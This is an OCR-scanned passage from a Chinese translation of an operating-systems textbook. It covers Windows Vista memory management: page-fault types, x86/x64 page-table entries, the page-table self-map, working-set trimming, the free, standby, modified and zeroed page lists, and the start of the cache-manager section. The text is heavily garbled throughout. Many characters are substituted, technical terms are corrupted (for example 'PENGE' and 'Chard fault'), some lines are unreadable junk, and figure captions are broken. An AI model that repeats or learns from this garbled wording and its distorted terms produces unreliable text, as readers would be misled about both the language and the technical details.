会 使 用 任何 内 存 中 或 磁盘 上 的 资源 ， 从 这 个 意义 上 说 ， 它 们 是 “ 免 
TORIS 


磁盘 上 的 后 备 存储 


progl.exe prog2.exe 


图 11-32 被 映射 的 区 域 以 及 它们 在 位 一 上 的 “影子 页面。lib.dl 文 件 
被 同时 映射 到 两 个 地 址 空间 中 


1. 页 面 失效 处 理 


当 在 Windows Vista 上 局 动 一 个 进程 的 时 候 ， 很 多 映射 了 程序 的 
EXE 和 DLL 映像 文件 的 页 面 可 能 已 经 在 内 存 中 ， 这 是 因为 它们 可 能 被 
其 他 进程 共 译 。 了 映像 中 的 可 写 页 面 被 标记 成 写 时 复制 (copy-on- 
write) ， 使 得 它们 能 一 直 被 共享 ， 直 到 内 容 要 被 修改 的 那 一 刻 。 如 果 
操作 系统 从 一 次 过 去 的 执行 中 认 出 了 这 个 EXE， 它 可 能 已 经 通过 使 用 
微软 称 之 为 超级 预 读 取 (SuperFetch) 的 技术 记录 了 页 面 引用 的 模式 。 
超级 预 读 取 技术 符 试 预先 读 入 很 多 需要 的 页 面 到 内 存 中 ， 尽 管 进程 疝 
未 在 这 些 页 面 上 发 生 页 面 失效 。 这 一 技术 通过 重 到 从 磁盘 上 读 入 页 面 
和 执行 映像 中 的 初始 化 代码 ， 减 小 了 局 动 应 用 程序 所 需 的 延 时 。 同 
时 ， 它 改进 了 磁盘 的 吞吐 量 ， 因 为 使 用 了 超级 预 读 取 反 术 以 后 ， 磁 一 
驱动 器 能 够 更 轻易 地 组 织 对 磁 强 的 读 请 求 来 减少 所 需 的 寻 道 时 间 。 进 
程 预约 式 页 面 调度 (prepaging) 技术 也 用 到 了 系统 启动 、 把 后 台 应 用 
程序 移 到 前 台 以 及 休眠 之 后 重启 系统 当中 。 


存储 管理 器 文 持 预约 式 页 面 调 度 ， 但 是 它 被 实现 成 系统 中 一 个 单 
独 的 组 件 。 被 读 入 到 内 存 的 页 面 不 是 插入 到 进程 的 页 表 中 ， 而 是 插入 
到 后 备 列表 中 ， 从 而 使 得 在 需要 时 可 以 不 访问 磁盘 丈 将 它们 插入 到 进 
程 中 。 


未 被 映 冉 的 页 面 稍微 有 些 不 同 。 它 们 没有 被 通过 读 取 文 件 来 初始 
化 。 相 反 ， 一 个 未 家 映射 的 页 面 第 一 次 被 访问 的 时 候 ， 存 储 管理 郁 会 
提供 一 个 者 的 物理 页 面 ， 该 页 面 的 内 容 被 事先 清 零 (为 了 安全 方面 的 


原因 ) 。 在 后 续 的 页 面 失效 处 理 过 程 中 ， 未 被 映射 的 页 面 可 能 会 被 从 
内 存 中 找到 ， 人 否则 的 话 ， 它 们 必须 被 从 页 面 文件 中 重新 读 入 内 存 。 


存储 管理 器 中 的 按 需 分 页 十 通过 页 面 失效 来 驱动 的 。 在 每 次 页 面 
失效 发 生 的 时 候 ， 会 发 生 一 次 到 内 核 的 陷入 。 内 核 将 建立 一 个 说 明 发 
生 了 什么 事情 的 机 夯 无 天 的 描述 符 ， 并 把 该 摘 述 符 传递 给 存储 管理 郁 
相关 的 执行 部 件 。 存 储 管理 器 接 下 来 会 检查 引发 页 面 失 效 的 内 存 访问 
的 有 效 性 。 如 果 发 生 页 面 失 效 的 页 面 位 于 一 个 已 提交 的 区 域内 ， 和 存储 
管理 器 将 在 VAD 列 表 中 查找 页 面 地 址 并 找到 (或 创建 ) 进程 页 表 项 。 
对 于 共享 页 面 的 情况 ， 存 储 管理 器 使 用 与 内 存 区 对 象 关联 的 原始 页 表 
项 来 填写 进程 页 表 中 的 新 页 表 项 。 


不 同 处 理 右 体系 结构 下 的 页 表 项 的 格式 可 能 会 不 同 。 对 于 x86 和 
x64， 一 个 被 映射 页 面 的 页 表 项 如 图 11-33 所 示 。 如 果 一 个 页 表 项 被 标记 
为 有 效 ， 它 的 内 容 会 被 便 件 读 取 并 解释 ， 从 而 虚拟 地 址 能 够 转换 成 正 
硝 的 物理 地 址 。 未 被 映射 的 页 面 也 有 对 应 的 页 表 项 ， 但 是 这 些 页 表 项 
被 标记 成 无 效 ， 硬 件 将 忽略 这 些 页 表 项 除 该 标记 之 外 的 部 分 。 页 表 项 
的 软件 格式 与 硬件 格式 有 所 不 同 ， 软 件 格式 由 存储 管理 大 决定 。 例 
如 ， 对 于 一 个 未 映射 的 页 面 ， 它 必须 在 使 用 前 分 配 和 清 零 ， 这 一 点 可 
以 通过 页 表 项 来 表明 o 


页 表 项 中 有 两 个 重要 的 位 是 直接 由 硬件 更 新 的 ， 它 们 是 访问 位 
(access bit) 和 及 位 (dirty bit) 。 这 两 个 位 跟踪 了 什么 时 候 一 个 特定 


的 页 面 映射 用 来 访问 该 页 面 以 及 这 个 访问 是 否 以 写 的 方式 修改 了 页 面 
的 内 容 。 这 确实 很 有 助 于 提高 系统 性 能 。 因 为 存储 管理 器 可 以 使 用 访 
问 位 来 实现 LRU (Least-Recently Used， 最 近 最 少 使 用 ) 类 型 的 页 面 替 
换 策略 。LRU 原 理 是 ， 那 些 最 长 时 间 没 有 被 使 用 过 的 页 面 有 最 小 的 可 
能 性 在 不 久 的 将 来 被 再 次 使 用 。 访 问 位 使 存储 管理 器 知道 一 个 页 面 被 
访问 过 了 ， 脏 位 使 存储 管理 器 知道 一 个 页 面 被 修改 了 ， 或 者 更 重要 的 
是 ， 一 个 页 面 没有 被 修改 。 如 果 一 个 页 面 自 从 从 磁盘 上 读 到 内 存 后 没 
有 被 修改 过 ， 存 储 管理 器 就 没有 必要 在 将 该 页 面 用 到 其 他 地 方 之 前 将 
页 面 内 容 写 回 磁盘 了 。 


正如 表 11-33 所 示 ，x86 体 系 结构 通 音 使 用 32 位 大 小 的 页 表 项 ， 而 
x64 体 系 结构 使 用 64 位 大 小 的 页 表 项 。 在 域 上 面 的 唯一 区 别 是 x64 的 物 
理 页 号 域 是 30 位 ， 而 不 是 20 位 。 然 而 ， 现 今 存在 的 任何 x64 处 理 器 所 文 
持 的 物理 页 面 的 数量 都 要 远 小 于 x64 体 系 结构 所 能 表示 的 数量 。x86 体 
系 结构 也 支持 一 种 特殊 的 物理 地 址 扩展 (Physical Address Extension, 
PAE) 。PAE 模 式 允 许 处 理 器 访问 超过 4GB 的 物理 内 存 ， 附 加 的 物理 页 
框 位 要 求 PAE 模 式 下 的 页 表 项 也 是 64 位 。 
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图 11-33 一 个 a)Intel x86 体 系 结构 和 b)AMD x64 体 系 结构 上 的 已 映射 
页 面 的 页 表 项 (PTE) 


每 个 页 面 失效 都 可 以 归 入 以 下 五 类 中 的 一 类 : 


1) 所 引用 的 页 面 没 有 提交 。 


2) 笑 试 违反 权限 的 页 面 访问 。 


3) 修 改 一 个 共享 的 写 时 复制 页 面 。 
4) 需 要 扩大 栈 。 


5) 所 引用 的 页 已 经 提交 但 是 当前 没有 映射 。 


第 一 种 和 第 二 种 情况 是 由 于 编程 错误 引起 。 如 果 一 个 程序 试图 使 
用 一 个 没有 一 个 有 效 映射 的 地 址 或 试图 进行 一 个 称 为 访问 违例 (access 
violation) 的 无 效 操作 (例如 试图 写 一 个 只 读 的 页 面 ) ， 通 常 的 结果 
征 ， 这 个 进程 会 被 终止 。 访 问 破 坏 的 原因 通 前 是 坏 指 针 ， 包 括 访 问 从 
进程 释放 的 和 被 解除 映射 的 内 存 。 


第 三 种 情况 与 第 二 种 情况 有 相同 的 症状 (试图 写 一 个 只 读 的 页 
fi) ， 但 是 处 理 方式 是 不 一 样 的 。 因 为 页 面 已 经 标记 为 写 时 复制 ， 存 
储 管理 右 不 会 报告 访问 违例 ， 相 反 它 会 为 当前 进程 产生 一 个 该 页 面 的 
私有 副本 ， 然 后 返回 到 试图 写 该 页 面 的 线程 。 该 线程 将 重 试 写 控 作 ， 
而 这 次 的 写 操作 将 会 成 功 完成 而 不 会 引发 页 面 失 效 。 


第 四 种 情况 在 线程 向 栈 中 压 入 一 个 值 ， 而 这 个 值 会 被 写 到 一 个 还 
没有 被 分 配 的 页 面 的 情况 下 发 生 。 存 储 管理 器 程序 能 够 识别 这 种 特殊 
情况 。 只 要 为 栈 保留 的 虚拟 页 面 还 有 空间 ， 存 储 管理 如 束 会 提供 一 个 
新 的 物理 页 面 ， 将 该 页 面 清 零 ， 最 后 把 该 页 面 映射 到 进程 地 址 空间 。 
线程 在 恢复 执行 的 时 候 会 重 试 上 次 引发 页 面 失效 的 内 存 访问 ， 而 这 次 
该 访问 会 成 功 。 


最 后 ， 第 五 种 情况 束 古 肖 见 的 页 面 失 效 。 这 种 异 第 包含 下 述 儿 种 
情况 。 如 果 该 页 是 由 文件 映射 的 ， 内 存 管理 占 必 须 查 找 该 页 与 内 存 区 
对 象 结合 在 一 起 的 原型 页 表 等 类 似 的 数据 结构 ， 从 而 保证 在 内 存 中 不 
存在 该 页 的 副本 。 如 果 该 页 的 副本 已 经 在 内 存 中 ， 即 在 另 一 个 进程 的 


页 面 链 表 已 经 存在 该 页 面 的 副本 ， 或 者 在 后 备 、 已 修改 页 链表 中 ， 则 
\ 需 要 共享 该 页 即 可 。 否 则 ， 内 存 管 理 器 分配 一 个 空 几 的 物理 页 面 ， 
并 安排 从 磁盘 复制 文件 页 。 


O 


N 


如 有 果 内 存 管理 圳 能 够 从 内 存 中 找到 需要 的 页 而 不 是 去 磁盘 查找 从 
而 响应 页 面 失效 ， 则 称 为 软 异 常 (soft fault) 。 如 果 需 要 从 磁盘 进行 复 
制 ， 则 称 为 硬 异 常 Chard fault) 。 软 异常 同 硬 异常 相 比 开销 更 小 ， 对 于 
应 用 程序 性 能 的 影响 很 小 。 软 异常 出 现在 下 面 场景 中 : 一 个 共享 的 页 
已 经 映射 到 另 一 个 进程 ， 请 求 一 个 新 的 全 零 页 ， 或 所 需 页 面 已 经 从 进 
程 的 工作 集 移 除 ， 但 是 还 没有 重用 。 


当 一 个 物理 页 面 不 再 映射 到 任何 进程 的 页 表 ， 将 进入 以 下 三 种 状 
态 之 一 : 空 几 、 修 改 或 后 备 。 内 存 管理 絮 会 立刻 释放 类 似 那 些 已 结 
进程 的 栈 页 面 这 样 不 再 会 使 用 的 页 面 。 根 据 判断 映射 页 面 的 页 表 项 中 
的 上 次 从 磁盘 读 出 后 的 脏 位 是 人 否 设置 ， 页 面 可 能 会 再 次 发 生 异 币 ， 从 
而 进入 已 修改 链表 或 者 后 备 链 表 (standby list) 。 已 修改 链表 中 的 页 面 
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NEE Bi a AY MRI m 2M 28 ABE CE J REZ OP AC UT 
ETE BC DU TE HA tik a RAZE, ee TE CB RE eA J RER HI 
查 该 页 面 是 否 已 经 在 内 存 中 。Windows Vista 中 的 预约 式 调 页 机 制 通过 
读 入 那些 未 来 可 能 会 用 到 的 页 面 并 把 它们 插入 后 备 链表 的 方式 将 硬 异 
党 转化 为 软 异 弟 。 内 存 管理 融通 过 读 入 成 组 的 连续 页 面 而 不 古 仅仅 一 


个 页 面 来 进行 一 定数 量 的 普通 预约 式 调 页 。 多 余 调 入 的 页 面 立刻 插入 
后 备 链表 。 而 由 于 内 存 管理 絮 的 开销 主要 是 进行 WO 控 作 引起 的 ， 因 而 
预约 式 调 页 并 不 会 市 来 很 大 的 浪费 。 与 读 入 一 簇 页 面相 比 ， 仪 读 入 一 
个 页 面 的 额外 开销 是 可 以 忽略 的 。 


图 11-33 中 的 页 表 项 指 的 是 物理 页 号 ， 而 不 是 虚拟 页 号 。 为 了 更 新 
页 表 (以 及 页 目录 ) 项 ， 内 核 需要 使 用 虚拟 地 址 。Windows 使 用 如 图 
A NRE tol ace cae 井 程 的 页 表 
和 页 目录 映射 到 内 核 虚 拟 地 址 空间 。 通 过 映射 页 目录 项 到 页 目录 ( 自 
映射 ) ， 就 具有 了 能 用 来 指向 页 目录 项 (图 11-34a) 和 页 表 项 (图 11- 
34b) 的 虚拟 地 址 。 每 个 进程 的 自 了 映射 占用 4MB 内 核 地 址 空间 (x86 
E) 。 幸 运 的 是 ， 该 4MB 地 址 空间 是 同样 一 块 地 址 空间 。 


100.0009 taae 0090909 ton ononon 1 10r ooon 1100 10000108 
a) b) 


Self-map: PD[0xc0300000>>22] is PD (page-directory) 
Virtual address (a): (PTE *)(0xc0300c00) points to PD[0x300] which is the self-map page directory entry 
Virtual address (b): (PTE *)(0xc0390c84) points to PTE for virtual address 0xe4321000 


Al 11-34 x86 上 ，Windows 用 来 映射 页 表 和 页 目录 的 物理 页 面 到 内 核 
虚拟 地 址 的 自 映射 表 项 


2. 页 面 置 换算 法 


当空 闲 物理 页 面 数量 降 得 较 低 时 ， 内 存 管理 器 开始 从 内 核 态 的 系 
统 进程 以 及 用 户 仿 进程 移 走 页 面 。 目标 殉 是 使 得 最 重要 的 虚拟 页 面 在 
内 存 中 ， 而 其 他 的 在 磁 强 上 。 决 定 什么 是 重要 的 需要 技巧 。Windows 通 
过 大 量 使 用 工作 集 来 解决 这 一 问题 。 工 作 集 处 在 内 存 中 ， 不 需要 通过 
页 面 失效 即 可 使 用 的 映射 入 内 存 的 页 面 。 当 然 ， 工 作 集 的 大 小 和 构成 
随 着 从 属于 进程 的 线程 运行 来 回 变 动 。 


每 个 进程 的 工作 集 由 两 个 参数 摘 述 : 最 小 值 和 最 大 值 。 这 两 个 参 
数 并 不 是 硬性 边界 ， 因 而 一 个 进程 在 内 存 中 可 能 具有 比 它 的 工作 集 最 
小 值 还 小 的 页 面 数量 (在 特定 的 环境 下 ) ， 或 者 比 它 的 工作 集 最 大 值 
还 大 得 多 的 页 面 数 量 。 每 个 进程 初始 具有 同样 的 最 大 值 和 最 小 值 的 工 
作 集 ， 但 这 些 边界 随 痢 时 间 的 推移 是 可 以 改变 的 ， 或 是 由 包含 在 作业 
中 的 进程 的 作业 对 和 象 决定 。 根 据 系 统 中 的 全 部 物理 内 存 大 小 ， 这 个 默 
认 的 初始 最 小 值 的 范围 是 20~50 个 页 面 ， 而 最 大 值 的 范围 是 45 一 345 个 
页 面 。 系 统管 理 员 可 以 改变 这 些 默认 值 。 尽 管 一 般 的 家 庭 用 户 很 少 去 
设置 ,但 是 服务 器 端 程序 可 能 需要 设置 。 


只 有 当 系 统 中 的 可 用 物理 内 存 降 得 很 低 的 时 候 工作 集 才 会 起 作 
用 。 其 他 情况 下 允许 进程 任意 使 用 它们 选择 的 通常 远 远 超出 工作 集 最 
大 值 的 内 存 。 但 是 当 系统 面 临 内 存 讨 力 的 时 候 ， 内 存 管 理 右 开始 将 超 
出 工作 集 上 限 最 大 的 进程 使 用 的 内 存 压 回 到 它们 的 工作 集 范 围 内 。 工 
作 集 管理 器 具有 三 级 基于 定时 器 的 周期 活动 。 新 的 活动 会 加 入 到 相应 
的 级 别 。 


1) 大 量 的 可 用 内 存 : 扫 搞 页 面 ， 复 位 页 面 的 访问 位 ， 并 使 用 访问 位 
的 值 来 表示 每 个 页 面 的 新 旧 程 度 。 在 每 个 工作 集 内 保留 使 用 一 个 估算 
数量 的 未 使 用 页 面 。 


2) 内 存 开 始 紧缺 ， 对 每 个 具有 一 定 比 例 未 用 页 面 的 进程 ， 停 止 为 工 
作 集 增加 页 面 ， 同 时 在 需要 增加 一 个 新 的 页 面 的 时 候 换 出 最 旧 的 页 
面 。 换 出 的 页 面 进 入 后 备 或 者 已 修改 链表 。 


3) 内 存 紧缺 : 消减 (也 即 减 小 ) 工作 集 ， 通 过 移 除 最 旧 的 页 面 从 而 
降低 工作 集 的 最 大 值 。 


平衡 集 管理 器 (balance set manager) 线程 调用 工作 和 集 管理 器 ， 使 
得 其 每 秒 都 在 运行 。 工 作 集 管理 侣 抑制 一 定数 量 的 工作 从 而 不 会 使 得 
系统 过 载 。 它 同时 也 监控 要 写 回 位 盘 的 已 修改 链表 上 的 页 面 ， 通 过 唤 
桓 ModifiedPageWriter 线 程 使 得 页 面 数 量 不 会 增长 得 过 快 。 


3. 物 理 内 存 管理 


上 上面 提 到 了 物理 页 面 的 三 种 不 同 链表 ， 空 几 链 表 、 后 备 链表 和 已 
修改 链表 。 除 此 以 外 还 有 第 四 种 链表 ， 即 全 部 被 填 零 的 空 亲 页 面 。 系 
统 会 频繁 地 请 求全 零 的 页 面 。 当 为 进程 提供 新 的 页 面 ， 或 者 读 取 一 个 
文件 的 最 后 部 分 不 足 一 个 页 面 时 ， 需 要 全 零 页 面 。 将 一 个 页 面 写 为 全 
零 是 需要 时 间 的 ， 因 此 在 后 台 使 用 低 优先 级 的 线程 创建 全 零 页 是 一 个 
较 好 的 方式 。 另 外 还 有 第 五 种 链表 存放 有 硬件 错误 的 页 面 〈 即 通过 硬 
件 错误 检测 ) 。 


系统 中 的 所 有 页 面 要 么 由 一 个 有 效 的 页 表 项 索引 ， 要 么 属于 以 上 
五 种 链表 中 的 一 种 ， 它 们 的 全 体 称 为 页 框 号 数据 库 (PENGE) 。 图 
11-35 表 明 PFN 数 据 库 的 结构 。 该 表格 由 物理 页 框 号 索引 。 表 项 都 起 固 
定 长 度 的 ， 但 是 不 同类 型 的 表 项 使 用 不 同 的 格式 (例如 共享 页 面相 对 
于 私有 页 面 ) 。 有 效 的 表 项 维护 页 面 的 状态 以 及 指向 该 页 面 数 量 的 计 
数 。 工 作 集 中 的 页 面 指 出 哪个 表 项 索引 它们 。 还 有 一 个 指向 该 页 的 进 
程 页 表 的 指针 ( 非 共享 页 ， 或 者 指向 原型 页 表 的 指针 (共享 页 。 


页 帧 数据 库 


State Cnt WS Other PT Next 


O-NWA TDN Oo 


Al 11-35 一 个 有 效 的 页 面 在 页 框 数据 库 上 的 一 些 主要 域 


此 外 还 有 一 个 指向 链表 中 下 一 个 页 面 的 指针 (如 果 有 的 话 ) ， 以 
及 其 他 的 若干 诸如 正在 进行 读 和 写 的 域 以 及 标志 位 等 。 这 些 链表 链接 
在 一 起 ， 并 且 通 过 下 标 指向 下 一 个 单元 ， 不 使 用 指针 ， 从 而 达到 节省 
存储 空间 的 目的 。 另 外 用 物理 页 面 的 表 项 汇总 在 若干 指向 物理 页 面 的 
页 表 项 中 找到 的 脏 位 ( 即 由 于 共享 页 面 ) 。 表 项 还 有 一 些 别 的 信息 用 
来 表示 内 存 页 面 的 不 同 ， 以 便 访 问 那些 内 存 速度 更 快 的 大 型 服务 器 系 
统 上 ( 即 NUMA- 非 均衡 存储 器 访问 的 机 器 ) 。 


工作 集 管理 右 和 其 他 的 系统 线程 控制 页 面 在 工作 集 和 不 同 的 链表 
间 和 移动。 下面 对 这 些 转变 进行 研究 。 当 工作 集 管 理事 将 一 个 页 面 从 茶 


个 工作 集中 去 掉 ， 则 该 页 面 按照 自身 是 否 修改 的 状态 进入 后 备 或 已 修 
改 链表 的 底部 。 这 一 转变 在 图 11-36 的 (1) 中 进行 了 说 明 。 


需要 全 零 页 面 (8) 


被 修改 


2S Fl 而 AEH 
页 面 链 ears | ene 
表 |(4) 已 修 面 链表 |(7) AE 
改 页 面 写 页 面 线程 
入 器 


(1) 从 所 有 的 工作 集 收 回 的 页 面 (3) 进程 退出 


图 11-36 不 同 的 页 面 链表 以 及 它们 之 间 的 转变 


这 两 个 链表 中 的 页 面 仍然 是 有 效 的 页 面 ， 当 页 面 失效 发 生 的 时 候 
需要 它们 中 的 一 个 页 ， 则 将 该 页 移 回 工作 集 而 不 需要 进行 磁盘 IO 操作 
(2) 。 当 一 个 进程 退出 ， 该 进程 的 非 共 享 页 面 不 能 通过 异常 机 制 回 到 
以 前 的 工作 集 ， 因 此 该 进程 页 表 中 的 有 效 页 面 以 及 挂 起 和 已 修改 链表 
中 的 页 面 都 移入 空闲 链表 (3) 。 任何 该 进程 的 页 面 文件 也 得 到 释放 。 


其 他 的 系统 调用 会 引起 别 的 转变 。 平 衡 集 管理 右 线 程 每 4 秒 运 行 一 
次 来 得 找 那 些 所 有 的 线程 都 进入 空腹 状态 超过 一 定 秒 数 的 进程 。 如 采 
发 现 这 样 的 进程 ， 束 从 物理 内 存 去 掉 它 们 的 内 核 栈 ， 这 样 的 进程 的 页 
面 也 如 (1) 一 样 移动 到 后 备 链表 或 已 修改 链表 。 


两 个 系统 线程 一 一 映射 页 面 写 入 器 (mapped page writer) 和 已 修 
改 页 面 写 入 器 (modified page writer) ， 周 期 性 地 被 唤醒 来 检查 是 否 系 
统 中 有 足够 的 干净 页 面 。 如 有 果 没 有 ， 这 两 个 线程 从 已 修改 链表 的 顶 首 
取出 页 面 ， 写 回 到 磁 强 ， 然 后 将 这 些 页 面 插入 后 备 链表 (4) 。 前 者 处 
理 对 于 映射 文件 的 写 ， 而 后 者 处 理 页 面 文件 的 写 。 这 些 写 的 结果 就是 
将 已 修改 GE) 页 面 移 到 后 备 (干净 ) 链表 中 。 


之 所 以 使 用 两 个 线程 是 因为 映射 文件 可 能 会 因为 写 的 结 来 增长 ， 
而 增长 的 结果 束 需 要 对 磁盘 上 的 数据 结构 具有 相应 的 权限 来 分 配 空间 
人 磁盘 块 。 当 一 个 页 面 被 写 入 时 如 果 没 有 足够 的 内 存 ， 束 会 导致 死 锁 。 
另 一 个 线程 则 是 解决 癌 页 面 文件 写 入 页 时 的 问题 。 


下 面 说 明和 多 11-36 中 夯 一 个 转换 。 如 条 进程 解除 页 映射 ， 该 页 不 再 
和 进程 相关 从 而 进入 空闲 链表 (5) ， 当 该 页 是 共享 的 时 候 例外 。 当 页 
面 失 效 会 请 求 一 个 页 框 给 将 要 读 入 的 页 ， 此 时 该 页 框 会 尽 可 能 从 空闲 
链表 中 取 下 (6) 。 由 于 该 页 会 被 全 部 重 写 ， 因 此 即使 有 机 密 的 信息 也 
没有 关系 。 


栈 的 增长 则 是 男 一 种 情况 。 这 种 情况 下 ， 需 要 一 个 空 的 页 框 ， 同 
时 安全 规则 要 求 该 页 全 零 。 由 于 这 个 原因 ， 另 一 个 称 为 零 页 面 线程 
(ZeroPage thread) 的 低 优先 级 内 核 线程 (参见 图 11-28) 将 空间 链表 中 
的 页 面 写 全 零 并 将 页 面 放 入 全 零 页 链表 (7) 。 全 零 页 面 很 可 能 比 空闲 
页 面 更 加 有 用 ， 因 此 只 要 当 CPU 空 亲 且 有 罕 亲 页面， 零 页 面 线程 区 会 


将 这 些 页 面 全 部 写 零 ， 而 在 CPU 空 用 的 时 候 进 行 这 一 操作 也 是 不 增加 
开销 的 。 


所 有 这 些 链表 的 存在 导致 了 一 些微 妙 的 策略 抉择 。 例 如 ， 假 设 要 
从 磁盘 载 入 一 个 页 面 ， 但 是 至 朵 链表 是 空 的 ， 那 么 ， 要 么 从 后 备 链表 
中 取出 一 个 干净 页 (虽然 这 样 做 稍 后 有 可 能 导致 缺 页 ) ， 要 么 从 全 零 
页 面 链 表 中 取出 一 个 空 页 (名 略 把 该 页 清 零 的 代价 ) ， 系 统 必须 在 上 
述 两 种 策略 之 间 做 出 选择 。 哪 一 个 更 好 呢 ? 


内 存 管理 紫 必 须 决定 系统 线程 把 页 面 从 已 修改 链表 移动 到 后 备 链 
表 的 积极 程度 。 有 干净 的 页 面 后 备 总 比 有 脏 页 后 备 好 得 多 (因为 如 有 
需要 ， 干 净 的 页 可 以 立即 重用 ) ， 但 是 一 个 积极 的 净化 策略 意味 着 更 
多 的 位 到 IO， 同 时 一 个 刚刚 净化 的 页 面 可 能 由 于 缺 页 中 断 重 新 回 到 工 
作 集 中， 然后 又 成 为 脏 页 。 通 常 来 讲 ，Windows 通 过 算法 、 局 发 、 猜 
测 、 历 史 、 经 验 以 及 管理 员 可 挥 参数 的 配置 来 做 权衡 。 


总 而 言 之 ， 内 存 管理 需要 一 个 拥有 多 种 数据 结构 、 算 法 和 局 发 性 
的 十 分 复 灯 、 重 要 的 构件 。 它 尽 可 能 地 目 我 调整 ， 但 是 仍然 留 有 很 多 
选项 使 系统 管理 员 可 以 通过 配置 这 些 选项 来 影响 系统 性 能 。 大 部 分 的 
选项 和 计数 右 可 以 通过 工具 浏 咒 ， 相 天 的 各 种 工具 包 在 前 面 剖 有 近 
到 。 也 许 在 这 里 最 值得 记 住 的 束 是 ， 在 真实 的 系统 里 ， 内 存 管理 不 仅 
仪 古 一 个 简单 的 时 钟 或 老化 的 页 面 算法 。 


11.6 Windows Vista 的 高 速 缓存 


Windows 高 速 缓存 (cache) 通过 把 最 近 和 经 常 使 用 的 文件 片段 保 
存在 内 存 中 的 方式 来 提升 文件 系统 的 性 能 。 高 速 缓存 管理 器 管理 的 是 
虚拟 寻 址 的 数据 块 ， 也 就 是 文件 片段 ， 而 不 是 物理 寻 址 的 磁盘 块 。 这 
种 方法 非常 适合 NTFS 文 件 系 统 ， 如 11.8 市 所 示 。NTFS 把 所 有 的 数据 
作为 文件 来 存储 ， 包 括 文件 系统 的 元 数据 。 高 速 缓存 的 文件 片段 称 为 
视图 (view) ， 这 是 因为 它们 代表 了 被 映射 到 文件 系统 的 文件 上 的 内 
核 虚 拟 地 址 片段 。 所 以 ， 在 高 速 缓存 中 ， 对 物理 内 存 的 管理 实际 上 是 
由 内 存 管理 器 提供 的 。 高 速 缓存 管理 器 的 作用 是 为 视图 管理 内 核 虚 拟 
地 址 的 使 用 ， 命 令 内 存 管 理 器 在 物理 内 存 中 钉 住 页 面 ， 以 及 为 文件 系 


统 提供 接口 。 


Windows 高 速 缓存 管理 右 工 具 在 文件 系统 中 被 广泛 地 共 理 。 这 是 
因为 高 速 缓存 是 根据 独立 的 文件 来 虚拟 寻 址 的 ， 高 速 缓存 管理 右 可 以 
在 文件 的 基础 上 很 轻易 地 实现 预 读 取 。 访 问 高 速 缓存 数据 的 请 求 来 目 

于 每 个 文件 系统 。 由 于 文件 系统 不 需要 先 把 文件 的 偏 移 转 换 成 物理 磁 
盘 号 然后 再 请 求 读 取 高 速 组 存 的 文件 页 ， 所 以 虚拟 缓存 非常 方便 。 类 
似 的 转换 发 生 在 内 存 管 理 吉 调 用 文件 系统 访问 存储 在 磁盘 上 的 页 面 的 
时 候 。 


除了 对 内 核 虚拟 地 址 和 用 来 缓存 的 物理 内 存 资源 的 管理 外 ， 考 虑 
到 视 独 的 一 致 性 ， 大 批量 磁盘 回 写 ， 以 及 文件 结束 标志 的 正确 维护 
(特别 是 当 文件 扩展 的 时 候 ) ， 高 速 缓存 管理 器 还 必须 与 文件 系统 协 
作 。 在 文件 系统 、 融 速 缓存 管 理 器 和 内 存 管理 右 之 间 管 理 文件 最 困难 
的 方面 在 于 文件 中 最 后 一 个 字 市 的 偏 移 ， 即 有 效 数 据 长 度 。 如 有 末 一 个 
程序 写 出 了 文件 未 尾 ， 则 越过 的 磁 强 块 都 需要 清 零 ， 同 时 为 了 安全 的 
原因 ， 在 文件 的 元 数据 中 记录 的 有 效 数 据 长 度 不 应 该 允许 访问 未 经 初 
台 化 的 磁盘 块 ， 所 以 全 和 零 磁 盘 块 在 文件 元 数据 更 新 为 新 的 长 度 之 前 必 
须 写 回 到 磁盘 上 。 然 而 ， 可 以 预见 的 是 ， 如 采 系 统 骨 涡 ， 一 些 文件 的 
数据 块 可 能 还 没有 按照 内 存 中 的 数据 进行 更 新 ， 还 有 一 些 数据 块 可 能 
含有 属于 其 他 文件 的 数据 ， 这 都 是 不 能 接受 的 。 


现在 让 我 们 来 看 看 高 速 缓存 管理 器 是 如 何 工作 的 。 当 一 个 文件 被 
引用 时 ， 高 速 缓 存 管理 妖 映 射 一 块 大 小 为 256KB 的 内 核 虚 拟 地 址 空间 
给 文件 。 如 果 文 件 大 于 256KB， 那 么 每 次 只 有 一 部 分 文件 被 映射 进 
来 。 如 果 高 速 组 存 管理 絮 耗 尽 了 虚拟 地 址 空间 中 大 小 为 256KB 的 块 ， 
那么 ， 它 在 映射 一 个 新 文件 之 前 必须 释放 一 个 旧 的 文件 。 文 件 一 旦 被 
映射 ， 高 速 缓存 管理 器 通过 把 内 核 虚 拟 地 址 空间 复制 到 用 户 缓冲 区 的 
方式 来 满足 对 该 数据 块 的 请 求 。 如 果 要 复制 的 数据 块 不 在 物理 内 存 当 
中 ,会 发 生 缺 页 中 断 ， 内 存 管理 器 会 按照 通常 的 方式 处 理 该 中 断 。 高 
速 缓存 管理 器 其 至 不 知道 一 个 数据 块 是 不 是 在 内 存 当 中 。 复 制 总 是 成 
功 的 。 


除了 在 内 核 和 用 户 缓冲 区 之 间 复 制 的 页 面 ， 高 速 组 存 管理 右 也 为 
映射 到 虚拟 内 存 的 页 面 和 依靠 指针 访问 的 页 面 服务 。 当 一 个 线程 访问 
某 一 映射 到 文件 中 的 虚拟 地 址 但 发 生 缺 页 的 时 候 ， 内 存 管 理 融 在 大 多 
数 情况 下 能 够 使 用 软 中 断 处 理 这 种 访问 。 如 果 该 页 面 已 经 被 高 速 缓存 
管理 絮 映 冉 到 内 存 当 中 ， 即 该 页 面 已 经 在 物理 内 存 当中 ， 那 么 束 不 需 
要 去 访问 磁盘 了 。 


高 速 缓存 不 一 定 适 合 所 有 的 应 用 程序 。 大 型 企业 应 用 程序 ， 如 
SQL， 希 望 自己 来 管理 高 速 缓存 和 1/O。Windows 人 允许 文件 绕 开 高 速 绥 
存 管理 硕 ， 以 未 缓 促 1/O 的 方式 打开 。 从 历史 上 看 ， 这 类 应 用 程序 使 用 
一 个 可 增长 的 用 户 态 虚 拟 地 址 空间 来 奉 代 操作 系统 提供 的 高 速 缓存 ， 
因此 ， 系 统 应 支持 一 种 配置 ， 使 得 重新 启动 后 能 给 应 用 程序 提供 其 所 
需 的 3GB 的 用 户 态 地 址 空间 ， 而 只 使 用 1GB 的 地 址 空间 用 于 内 核 态 来 
代替 2-GB/2-GB 的 传统 分 割 。 这 种 运行 模式 〈 局 动 选项 启用 后 ， 称 为 
3GB 模 式 ) 在 一 些 允 许 以 多 种 粒度 来 调整 用 户 /内 核 地 址 空间 分 割 的 操 
作 系 统 上 不 太 灵 活 。 当 Windows 运 行 在 3GB 模 式 下 时 ， 只 有 一 半数 量 
